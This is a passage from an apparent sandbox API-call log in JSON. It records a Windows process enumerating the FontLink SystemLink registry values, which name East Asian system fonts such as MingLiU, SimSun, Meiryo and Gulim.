            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "23"
              },
              {
                "name": "ValueName",
                "value": "MingLiU"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\MingLiU"
              }
            ],
            "repeated": 0,
            "id": 246
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "24"
              },
              {
                "name": "ValueName",
                "value": "PMingLiU"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\PMingLiU"
              }
            ],
            "repeated": 0,
            "id": 247
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "25"
              },
              {
                "name": "ValueName",
                "value": "MingLiU_HKSCS"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\MingLiU_HKSCS"
              }
            ],
            "repeated": 0,
            "id": 248
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "26"
              },
              {
                "name": "ValueName",
                "value": "MingLiU-ExtB"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\MingLiU-ExtB"
              }
            ],
            "repeated": 0,
            "id": 249
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "27"
              },
              {
                "name": "ValueName",
                "value": "PMingLiU-ExtB"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\PMingLiU-ExtB"
              }
            ],
            "repeated": 0,
            "id": 250
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "28"
              },
              {
                "name": "ValueName",
                "value": "MingLiU_HKSCS-ExtB"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\MingLiU_HKSCS-ExtB"
              }
            ],
            "repeated": 0,
            "id": 251
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "29"
              },
              {
                "name": "ValueName",
                "value": "Microsoft JhengHei"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Microsoft JhengHei"
              }
            ],
            "repeated": 0,
            "id": 252
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "30"
              },
              {
                "name": "ValueName",
                "value": "Microsoft JhengHei Bold"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Microsoft JhengHei Bold"
              }
            ],
            "repeated": 0,
            "id": 253
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "31"
              },
              {
                "name": "ValueName",
                "value": "Microsoft JhengHei UI"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Microsoft JhengHei UI"
              }
            ],
            "repeated": 0,
            "id": 254
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "32"
              },
              {
                "name": "ValueName",
                "value": "Microsoft JhengHei UI Bold"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Microsoft JhengHei UI Bold"
              }
            ],
            "repeated": 0,
            "id": 255
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "33"
              },
              {
                "name": "ValueName",
                "value": "Microsoft JhengHei UI Light"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Microsoft JhengHei UI Light"
              }
            ],
            "repeated": 0,
            "id": 256
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "34"
              },
              {
                "name": "ValueName",
                "value": "SimSun"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\SimSun"
              }
            ],
            "repeated": 0,
            "id": 257
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "35"
              },
              {
                "name": "ValueName",
                "value": "SimSun-ExtB"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\SimSun-ExtB"
              }
            ],
            "repeated": 0,
            "id": 258
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "36"
              },
              {
                "name": "ValueName",
                "value": "NSimSun"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\NSimSun"
              }
            ],
            "repeated": 0,
            "id": 259
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "37"
              },
              {
                "name": "ValueName",
                "value": "Microsoft YaHei"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Microsoft YaHei"
              }
            ],
            "repeated": 0,
            "id": 260
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "38"
              },
              {
                "name": "ValueName",
                "value": "Microsoft YaHei Bold"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Microsoft YaHei Bold"
              }
            ],
            "repeated": 0,
            "id": 261
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "39"
              },
              {
                "name": "ValueName",
                "value": "Microsoft YaHei UI"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Microsoft YaHei UI"
              }
            ],
            "repeated": 0,
            "id": 262
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "40"
              },
              {
                "name": "ValueName",
                "value": "Microsoft YaHei UI Bold"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Microsoft YaHei UI Bold"
              }
            ],
            "repeated": 0,
            "id": 263
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "41"
              },
              {
                "name": "ValueName",
                "value": "Microsoft YaHei UI Light"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Microsoft YaHei UI Light"
              }
            ],
            "repeated": 0,
            "id": 264
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "42"
              },
              {
                "name": "ValueName",
                "value": "Yu Gothic UI"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Yu Gothic UI"
              }
            ],
            "repeated": 0,
            "id": 265
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "43"
              },
              {
                "name": "ValueName",
                "value": "Yu Gothic UI Bold"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Yu Gothic UI Bold"
              }
            ],
            "repeated": 0,
            "id": 266
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "44"
              },
              {
                "name": "ValueName",
                "value": "Yu Gothic UI Light"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Yu Gothic UI Light"
              }
            ],
            "repeated": 0,
            "id": 267
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "45"
              },
              {
                "name": "ValueName",
                "value": "Yu Gothic UI Semilight"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Yu Gothic UI Semilight"
              }
            ],
            "repeated": 0,
            "id": 268
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "46"
              },
              {
                "name": "ValueName",
                "value": "Yu Gothic UI Semibold"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Yu Gothic UI Semibold"
              }
            ],
            "repeated": 0,
            "id": 269
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "47"
              },
              {
                "name": "ValueName",
                "value": "Meiryo"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Meiryo"
              }
            ],
            "repeated": 0,
            "id": 270
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "48"
              },
              {
                "name": "ValueName",
                "value": "Meiryo Bold"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Meiryo Bold"
              }
            ],
            "repeated": 0,
            "id": 271
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "49"
              },
              {
                "name": "ValueName",
                "value": "Meiryo UI"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Meiryo UI"
              }
            ],
            "repeated": 0,
            "id": 272
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "50"
              },
              {
                "name": "ValueName",
                "value": "Meiryo UI Bold"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Meiryo UI Bold"
              }
            ],
            "repeated": 0,
            "id": 273
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "51"
              },
              {
                "name": "ValueName",
                "value": "MS Gothic"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\MS Gothic"
              }
            ],
            "repeated": 0,
            "id": 274
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "52"
              },
              {
                "name": "ValueName",
                "value": "MS PGothic"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\MS PGothic"
              }
            ],
            "repeated": 0,
            "id": 275
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "53"
              },
              {
                "name": "ValueName",
                "value": "MS UI Gothic"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\MS UI Gothic"
              }
            ],
            "repeated": 0,
            "id": 276
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "54"
              },
              {
                "name": "ValueName",
                "value": "MS Mincho"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\MS Mincho"
              }
            ],
            "repeated": 0,
            "id": 277
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "55"
              },
              {
                "name": "ValueName",
                "value": "MS PMincho"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\MS PMincho"
              }
            ],
            "repeated": 0,
            "id": 278
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "56"
              },
              {
                "name": "ValueName",
                "value": "Batang"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Batang"
              }
            ],
            "repeated": 0,
            "id": 279
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "57"
              },
              {
                "name": "ValueName",
                "value": "BatangChe"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\BatangChe"
              }
            ],
            "repeated": 0,
            "id": 280
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "58"
              },
              {
                "name": "ValueName",
                "value": "Dotum"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Dotum"
              }
            ],
            "repeated": 0,
            "id": 281
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "59"
              },
              {
                "name": "ValueName",
                "value": "DotumChe"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\DotumChe"
              }
            ],
            "repeated": 0,
            "id": 282
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "60"
              },
              {
                "name": "ValueName",
                "value": "Gulim"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Gulim"
              }
            ],
            "repeated": 0,
            "id": 283
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
